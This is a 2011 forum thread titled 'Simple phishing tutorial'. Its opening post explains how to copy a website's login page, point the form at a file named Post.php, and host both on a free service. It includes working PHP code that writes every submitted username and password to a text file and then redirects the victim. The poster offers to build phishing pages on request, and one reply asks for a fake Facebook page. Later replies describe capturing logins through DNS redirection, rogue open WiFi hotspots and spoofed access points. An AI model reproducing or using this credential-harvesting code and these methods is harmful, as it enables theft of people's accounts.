Change background image
  1. What's up? I see you're viewing as a Guest. How about registering, it only takes like 2 minutes. This will enable you to do more on our forum and stay updated.

Simple phishing tutorial

Discussion in 'PC General' started by Sh3ll, Jun 17, 2011.

Thread Status:
This thread is more than 180 days old.
  1. Sh3ll

Sh3ll New Member Member

Well hey everyone as you know my name is R3b0rn, on today's post I will teach you how to make a Simple phish page.

The first step is go to the login page to the website you want to phish. Then once you reach that website view source and copy everything and paste it onto Notepad. No click someone on the notepad and click CTRL+F (Allows you to use search function) and type in "Action=" What ever the action is change it to Post.php then save that text document as Index.html or Index.htm it really won't matter.

Step 2 is to copy this code
    Code:
    <?php
    header ('Location: Http://www.xat.com');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?> 
    Copy that code and paste it into a new text document then save it as Post.php

Step 3 is go to ripway.com and register to an account and upload the 2 files you made. Then click the Make Text document and name it Usernames.txt but don't write anything.

Congrats you have now made a phish website. If you have any questions Post back, Or you can ask me to make you a phish website.
  2. Nuke547

Nuke547 Junior Member Member

Haha, nice.
    I should try that.
  3. D-Den

D-Den New Member Member

Hey can u plz create a fake facebook phish page...
    i badly need it.
  4. Crazy52

Crazy52 Gate Keeper Admin

lol i have something like this on my wifi pineapple

if they go to facebook.com the pineapple DNS redirects them to /facebook.html
    so all they see is something like http://facebook.com/facebook.html
    and it saves the login to a .txt file
  5. Coldfire202

Coldfire202 Herro There! Super-Mod

Clever, I wonder if you can do that on a wifi router
  6. dns

dns Active Member Admin

If you were to crack a wifi location you could reroute their dns to your own dns server that you have preconfigured. Otherwise you could create a open wifi hotspot with that dns server and anyone who uses it would be your bitch.

Sent from my SGH-T679 using Tapatalk 2
  7. Crazy52

Crazy52 Gate Keeper Admin

or you can get something like an older linksys router and install open-wrt or w/e on it and use opkg manager to install a captive portal and other stuff that may help you

i think you also may be able to do the same thing in backtrack generating a fake AP with an apache server running on the PC and spoofing the DNS to your local host
Thread Status:
This thread is more than 180 days old.